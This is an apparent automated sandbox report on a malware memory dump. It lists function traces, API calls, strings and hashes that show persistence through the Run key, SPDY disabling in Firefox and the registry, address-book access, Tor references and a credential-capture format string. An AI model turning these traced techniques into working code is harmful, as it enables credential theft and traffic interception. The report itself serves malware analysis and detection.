AuthRoot, xrefs: 009D240A
CertificateAuthority, xrefs: 009D2415
AddressBook, xrefs: 009D23FF
TrustedPeople, xrefs: 009D2436
TrustedPublisher, xrefs: 009D2441
Root, xrefs: 009D242B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: 68ae73a607798a046842f175061e4f3b34ef5e8a291b4e70a13f10b6317fb3bc
Instruction ID: b33d4dc34acb427abf7f2fa7a5febadcef99f6fb3807b75c4c3d22e5bb30fadf
Opcode Fuzzy Hash: 68ae73a607798a046842f175061e4f3b34ef5e8a291b4e70a13f10b6317fb3bc
Instruction Fuzzy Hash: 1201A526AD766072C12137E6FD0BFDF6E0CCFE6BB2F014012B518A21828DD54980D1F6

Uniqueness

Uniqueness Score: -1.00%

Function 009C0758, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009CB8FB: RtlEnterCriticalSection.NTDLL(009DE268), ref: 009CB903
Part of subcall function 009CB8FB: RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009CB918
Part of subcall function 009CB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 009CB931

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 009C078E
memset.NTDLL ref: 009C079F
lstrcmpi.KERNEL32(?,?), ref: 009C07DF
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009C0808
memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,009BB24E), ref: 009C081C
memset.NTDLL ref: 009C0829
memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009C0842
memcpy.NTDLL(-00000005,HIDDEN,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009C085D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,009BB24E), ref: 009C087A

Strings

Blocked, xrefs: 009C0761, 009C088A
HIDDEN, xrefs: 009C0857

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 3b9882a630660524267a02e8798656709c47d9af2ab8e31fc156f2a44105c432
Instruction ID: fddd8e3a82f498772cc49870bb11e9f0176afb14cf6d4e7b7f5e6318ea43a919
Opcode Fuzzy Hash: 3b9882a630660524267a02e8798656709c47d9af2ab8e31fc156f2a44105c432
Instruction Fuzzy Hash: 0241B931E40209EFDB209FA4CC85F9EBBB9FF84314F108429E505A3291D775AE859B91

Uniqueness

Uniqueness Score: -1.00%

Function 009CA098, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 009C888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 009C88D9
Part of subcall function 009C888D: lstrlenW.KERNEL32(?,?,00000000), ref: 009C88E5
Part of subcall function 009C888D: memset.NTDLL ref: 009C892D
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8948
Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8980
Part of subcall function 009C888D: lstrlenW.KERNEL32(?), ref: 009C8988
Part of subcall function 009C888D: memset.NTDLL ref: 009C89AB
Part of subcall function 009C888D: wcscpy.NTDLL ref: 009C89BD

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 009CA12B
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 009CA15A
RegSetValueExA.ADVAPI32(?,EnableSPDY3_0,00000000,00000004,00000000,00000004), ref: 009CA176
RegCloseKey.ADVAPI32(?), ref: 009CA17F
WaitForSingleObject.KERNEL32(00000000), ref: 009CA1C2
RtlExitUserThread.NTDLL(?), ref: 009CA1F8

Part of subcall function 009B7365: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74785520,?,?,009C1386,00000000,?,?), ref: 009B7383
Part of subcall function 009B7365: GetFileSize.KERNEL32(00000000,00000000,?,?,009C1386,00000000,?,?,?,?,00000000,009B1589,?,00000000,?,009C5B4A), ref: 009B7393
Part of subcall function 009B7365: CloseHandle.KERNEL32(000000FF,?,?,009C1386,00000000,?,?,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?), ref: 009B73F5

Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,009C1ED8), ref: 009C4282
Part of subcall function 009C4241: GetLastError.KERNEL32 ref: 009C428C
Part of subcall function 009C4241: WaitForSingleObject.KERNEL32(000000C8), ref: 009C42B1
Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 009C42D2
Part of subcall function 009C4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 009C42FA
Part of subcall function 009C4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 009C430F
Part of subcall function 009C4241: SetEndOfFile.KERNEL32(00000006), ref: 009C431C
Part of subcall function 009C4241: CloseHandle.KERNEL32(00000006), ref: 009C4334

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 009CA150
prefs.js, xrefs: 009CA0B0
user_pref("network.http.spdy.enabled", false);, xrefs: 009CA0E3, 009CA0F9
EnableSPDY3_0, xrefs: 009CA16E
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 009CA0B5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 90276831-3405794569
Opcode ID: 7d06e9646e01b178151af3bc4188647a18d624057bfea786b9b41d2b7613addc
Instruction ID: b28d540f20995f75711d33a3d5c5063257ef2d9e18171ae73aeb26be166ee358
Opcode Fuzzy Hash: 7d06e9646e01b178151af3bc4188647a18d624057bfea786b9b41d2b7613addc
Instruction Fuzzy Hash: AC418371E85208BFDB109BA5CC46FAEB7B9EB44714F04402AF504B7291E7B09E40DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009CEBD0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 009CEBE0
CreateFileW.KERNEL32(009D0C37,80000000,00000003,009DE0D4,00000003,00000000,00000000,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEBFD
GetLastError.KERNEL32(?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC9E

Part of subcall function 009C6AB9: lstrlen.KERNEL32(?,00000000,009CEC1E,00000027,009DE0D4,?,00000000,?,?,009CEC1E,Local\,00000001,?,009D0C37,00000000,00000000), ref: 009C6AEF
Part of subcall function 009C6AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 009C6B13
Part of subcall function 009C6AB9: lstrcat.KERNEL32(00000000,00000000), ref: 009C6B1B

GetFileSize.KERNEL32(009D0C37,00000000,Local\,00000001,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC29
CreateFileMappingA.KERNEL32(009D0C37,009DE0D4,00000002,00000000,00000000,009D0C37), ref: 009CEC3D
lstrlen.KERNEL32(009D0C37,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC59
lstrcpy.KERNEL32(?,009D0C37), ref: 009CEC69
GetLastError.KERNEL32(?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC71
HeapFree.KERNEL32(00000000,009D0C37,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC84
CloseHandle.KERNEL32(009D0C37,Local\,00000001,?,009D0C37), ref: 009CEC96

Strings

Local\, xrefs: 009CEC11

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: 6cf41268fd606b5f506a8279fca7ce387c3fd145dffa59545f0b9a1a3ad06f75
Instruction ID: 99649031a68bad2a9d01895e4f91fa712f6d6d74f5f120a728dc88bd5a0f1216
Opcode Fuzzy Hash: 6cf41268fd606b5f506a8279fca7ce387c3fd145dffa59545f0b9a1a3ad06f75
Instruction Fuzzy Hash: C1210770D85208FFDB109FA5DC48E9EBFB9EB44350F10846AF546E2261DB748A84EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D43D8, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D43FF
memcpy.NTDLL(?,?,00000010), ref: 009D4422
memset.NTDLL ref: 009D446E
lstrcpyn.KERNEL32(?,?,00000034), ref: 009D4482
GetLastError.KERNEL32 ref: 009D44B0
GetLastError.KERNEL32 ref: 009D44F3
GetLastError.KERNEL32 ref: 009D4512
WaitForSingleObject.KERNEL32(?,000927C0), ref: 009D454C
WaitForSingleObject.KERNEL32(?,00000000), ref: 009D455A
GetLastError.KERNEL32 ref: 009D45CF
ReleaseMutex.KERNEL32(?), ref: 009D45E1
RtlExitUserThread.NTDLL(?), ref: 009D45F7

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 14d2099b55d6d7e83af6d22e0f2115b2ccdf56e0f2f1ea65415ac73cb591b891
Instruction ID: df2214ee13b9491163aa14382d7365a2798b8f4564d460f644bfc05cca88a969
Opcode Fuzzy Hash: 14d2099b55d6d7e83af6d22e0f2115b2ccdf56e0f2f1ea65415ac73cb591b891
Instruction Fuzzy Hash: 69615E71599300AFC7219F25DC48A6BB7E9BF84720F008A1FF596D2290EB74E984DF52

Uniqueness

Uniqueness Score: -1.00%

Function 009B5A92, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B5AC4
WaitForSingleObject.KERNEL32(00000360,00000000), ref: 009B5AE6
ConnectNamedPipe.KERNEL32(?,?), ref: 009B5B06
GetLastError.KERNEL32 ref: 009B5B10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009B5B34
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 009B5B77
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 009B5B80
WaitForSingleObject.KERNEL32(00000000), ref: 009B5B89
CloseHandle.KERNEL32(?), ref: 009B5B9E
GetLastError.KERNEL32 ref: 009B5BAB
CloseHandle.KERNEL32(?), ref: 009B5BB8
RtlExitUserThread.NTDLL(000000FF), ref: 009B5BCE

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: d45b5be08e607dd4e38a637e13490997a7dbf21ff496be9ffd750098456bdf1d
Instruction ID: c447b1c0d9f8e521f9f380581711353142b96afb55a8cd34ff4384440a43b7ba
Opcode Fuzzy Hash: d45b5be08e607dd4e38a637e13490997a7dbf21ff496be9ffd750098456bdf1d
Instruction Fuzzy Hash: 6731D070059715AFE7109F28CC889AFBBADFB44320F010A2AF564D20A0DB709E89DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009B1C76, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 009B1CAF
memset.NTDLL ref: 009B1CC3

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

GetCurrentThreadId.KERNEL32 ref: 009B1D52
GetCurrentThread.KERNEL32 ref: 009B1D65
RtlEnterCriticalSection.NTDLL(06288D20), ref: 009B1E0C
Sleep.KERNEL32(0000000A), ref: 009B1E16
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009B1E3C
HeapFree.KERNEL32(00000000,?), ref: 009B1E6A
HeapFree.KERNEL32(00000000,00000018), ref: 009B1E7D

Strings

TorClient, xrefs: 009B1CD5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: 53c32e4e6b27cdb171e980eb00bee0135d176aaa4df3eb6eec657d06386c8470
Instruction ID: 8b8587c8134aa81abaf8b15fa787527716cea257ae4347c943537f4e3a6fbd28
Opcode Fuzzy Hash: 53c32e4e6b27cdb171e980eb00bee0135d176aaa4df3eb6eec657d06386c8470
Instruction Fuzzy Hash: BD5158B5919305AFD710DF28D980A9BBBE8FB88354F40092EF985D7261D730DD48DB62

Uniqueness

Uniqueness Score: -1.00%

Function 009CF83B, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 009CF853
RtlEnterCriticalSection.NTDLL(00000000), ref: 009CF894
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 009CF8A8
CloseHandle.KERNEL32(?,?,?,00000000), ref: 009CF8FD
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 009CF947
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009CF955
RtlLeaveCriticalSection.NTDLL(00000000), ref: 009CF960

Part of subcall function 009B3F5D: RegCreateKeyA.ADVAPI32(80000001,00000057,009B20D2), ref: 009B3F71
Part of subcall function 009B3F5D: memcpy.NTDLL(00000000,?,009B20D2,009B20D2,-00000005,?,009B488A,Scr,00000000,-00000005,00000001,?,?,?,009B6516,00000000), ref: 009B3F9A
Part of subcall function 009B3F5D: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,009B20D2), ref: 009B3FC3
Part of subcall function 009B3F5D: RegCloseKey.ADVAPI32(009B20D2,?,009B488A,Scr,00000000,-00000005,00000001,?,?,?,009B6516,00000000,Scr,?,?,747DF710), ref: 009B3FEE

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009CF89E
Client32, xrefs: 009CF864
rundll32, xrefs: 009CF906, 009CF90B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 3181710096-668865654
Opcode ID: 007166779f409f10db75b73b7f5107b02bd62e080de8fa6b5750e11e94f7698d
Instruction ID: 074a1cfaeb6179418914dd409afb52194a6645133a6fe8608f1fead0bccb9639
Opcode Fuzzy Hash: 007166779f409f10db75b73b7f5107b02bd62e080de8fa6b5750e11e94f7698d
Instruction Fuzzy Hash: 4A31A172E56200BBDF215F64DC95F6E77BEEB44B90F14043AF502E6061CB708D81E662

Uniqueness

Uniqueness Score: -1.00%

Function 009B47A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,767FD3B0,00000000,?,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000,00000000), ref: 009B47C5
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,009D58C6), ref: 009B47D8
StrTrimA.SHLWAPI(?,20000920,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,009D58C6), ref: 009B47FB
StrTrimA.SHLWAPI(00000001,20000920,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,009D58C6), ref: 009B480A
lstrlen.KERNEL32(?,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,009D58C6,?), ref: 009B483F
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 009B4852
lstrcpy.KERNEL32(00000004,?), ref: 009B4870
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,009B6516,00000000,Scr,?,?,747DF710,00000000), ref: 009B4896

Strings

Scr, xrefs: 009B487A, 009B48CC
W, xrefs: 009B47AF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: 3c033abaa3751ef0be420dc1036f79ced136e51c4bbc29a58bbd31a0f8bc2f03
Instruction ID: b284d89df66fedc5dd211c6056d27830fb1113e28d7c73c92b06d4080f541e35
Opcode Fuzzy Hash: 3c033abaa3751ef0be420dc1036f79ced136e51c4bbc29a58bbd31a0f8bc2f03
Instruction Fuzzy Hash: 1E31EE31956248FFDB109FA8DD44FAA7FBCEF45760F10441AB809A7211D7709980EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C1F6E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C06E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C0714
Part of subcall function 009C06E2: HeapFree.KERNEL32(00000000,00000000,?,?,009C1F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 009C0739

Part of subcall function 009C4151: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,009C1FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 009C418B
Part of subcall function 009C4151: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,009C1FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 009C41D7

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 009C1FE0
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 009C1FE8
lstrlen.KERNEL32(?), ref: 009C1FF2
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C2007
wsprintfA.USER32 ref: 009C203C
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 009C205E
HeapFree.KERNEL32(00000000,?), ref: 009C2073
HeapFree.KERNEL32(00000000,?), ref: 009C2080
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 009C208E

Strings

URL: %suser=%spass=%s, xrefs: 009C2036

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: 41ec8b424d23fde47fa8a1270f2353107aa849b20c143f459d6c6b9b42fedc7e
Instruction ID: 143e935b86ceb7a0c8dff9688cc3678bb69d14bc0e6862f0f8cb1246809c8938
Opcode Fuzzy Hash: 41ec8b424d23fde47fa8a1270f2353107aa849b20c143f459d6c6b9b42fedc7e
Instruction Fuzzy Hash: 0C31BE30A55315BBCB21AF64DC45F9BBBA9EF84750F00092EF944A21A2DB718854DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009C9695, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,009C2509,?,?,00000000), ref: 009C96A1
_aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 009C96B7
_snwprintf.NTDLL ref: 009C96DC
CreateFileMappingW.KERNEL32(000000FF,009DE0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 009C96F8
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,009C2509,?), ref: 009C970A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 009C9721
CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,009C2509), ref: 009C9742
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,009C2509,?), ref: 009C974A

Strings

Local\, xrefs: 009C96CB

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: 46d85e44d741c02bb1d3b6488d2442ae358da8a0f1602ce506943e1211d7dbde
Instruction ID: 68b567c129c7f8ec0116a886379fd40fdbc8cdba16b4460bdd6d059212340e6c
Opcode Fuzzy Hash: 46d85e44d741c02bb1d3b6488d2442ae358da8a0f1602ce506943e1211d7dbde
Instruction Fuzzy Hash: E9210A76A96204BBC711EFA8CC09FDE77BDAB84710F204026F605EB1D1DA709949DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009B8334, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,74785520), ref: 009B836A
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 009B837F
RegCreateKeyA.ADVAPI32(80000001,?), ref: 009B83A7
HeapFree.KERNEL32(00000000,?), ref: 009B83E8
HeapFree.KERNEL32(00000000,00000000), ref: 009B83F8
RtlAllocateHeap.NTDLL(00000000,009CAEC6), ref: 009B840B
RtlAllocateHeap.NTDLL(00000000,009CAEC6), ref: 009B841A
HeapFree.KERNEL32(00000000,00000000,?,009CAEC6,00000000,?,?,?), ref: 009B8464
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,009CAEC6,00000000,?,?,?), ref: 009B8488
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,009CAEC6,00000000,?,?), ref: 009B84AD
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,009CAEC6,00000000,?,?), ref: 009B84C2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 9059c68d175ad54f688a5a7575d0d720d61d9ab228f0f508a459211cc7f204b1
Instruction ID: 6d44207c6418962120c9de2f8734ea750b963b185bd7a05b77ec46f616f4c311
Opcode Fuzzy Hash: 9059c68d175ad54f688a5a7575d0d720d61d9ab228f0f508a459211cc7f204b1
Instruction Fuzzy Hash: B351D0B1C1220AEFDF119F94DD849EEBBBEFB08355B10846AE505A2160D7318E90EF60

Uniqueness

Uniqueness Score: -1.00%

Function 009D27DB, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,009D0745,00000000), ref: 009D27F5
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 009D280A
memset.NTDLL ref: 009D2817
HeapFree.KERNEL32(00000000,00000000,?,009D0744,?,?,00000000,?,00000000,009C279E,?,00000000), ref: 009D2834
memcpy.NTDLL(?,?,009D0744,?,009D0744,?,?,00000000,?,00000000,009C279E,?,00000000), ref: 009D2855

Strings

Content-Length:, xrefs: 009D2885
chun, xrefs: 009D28C3
Referer: , xrefs: 009D28D3
Transfer-Encoding:, xrefs: 009D28B2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: e3e34b9f598455557b36913bdbbf181e33085969fe729b3b35caa0e00a34ff39
Instruction ID: ff562d6fb202267f99e3d8150384451c86e65192234606790a2c63f676529e4f
Opcode Fuzzy Hash: e3e34b9f598455557b36913bdbbf181e33085969fe729b3b35caa0e00a34ff39
Instruction Fuzzy Hash: 2F31AD31A81701AFD7309F66CC41B57BBE9EF64710F00882BE94A97361D770E941EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009CFC77, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 009CFC92
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 009CFD43

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 009CFCE0
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 009CFCF2
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 009CFD11
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 009CFD23
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 009CFD2B

Strings

WABOpen, xrefs: 009CFCEC
Software\Microsoft\WAB\DLLPath, xrefs: 009CFC83

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: 58b7a5e07d5c131f9b372de153a4f34723f0f503dab354460c6ae9adac47bd23
Instruction ID: 9712da604342d067401cc5dd71d8c32e8a86564ef5720e5649ea0a52e46b213f
Opcode Fuzzy Hash: 58b7a5e07d5c131f9b372de153a4f34723f0f503dab354460c6ae9adac47bd23
Instruction Fuzzy Hash: 6B21D671D40218FFCB116BA5DC58EAEBF7EEB98310B20487AF902A3161D7704D49DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009B7EAA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 009B7EC2
StrChrA.SHLWAPI(00000001,00000020), ref: 009B7ED3

Part of subcall function 009B686F: lstrlen.KERNEL32(?,?,00000000,00000000,?,009C5C96,00000000,Referer: ,?,00000000,00000001), ref: 009B6881
Part of subcall function 009B686F: StrChrA.SHLWAPI(?,0000000D,?,009C5C96,00000000,Referer: ,?,00000000,00000001), ref: 009B68B9

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 009B7F0C
memcpy.NTDLL(00000000,http://,00000007), ref: 009B7F32
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 009B7F41
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 009B7F53

Strings

Host:, xrefs: 009B7EE3
http://, xrefs: 009B7F27, 009B7F30
https://, xrefs: 009B7F1E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: b5f1d21e78f2803155cf3fe7f060cdb906917b8ca92cf455d061f10db8d332d5
Instruction ID: 780789b48e1b39e89e347be46815c5ab29f632a5ab1e940f15c88f9b42670f2b
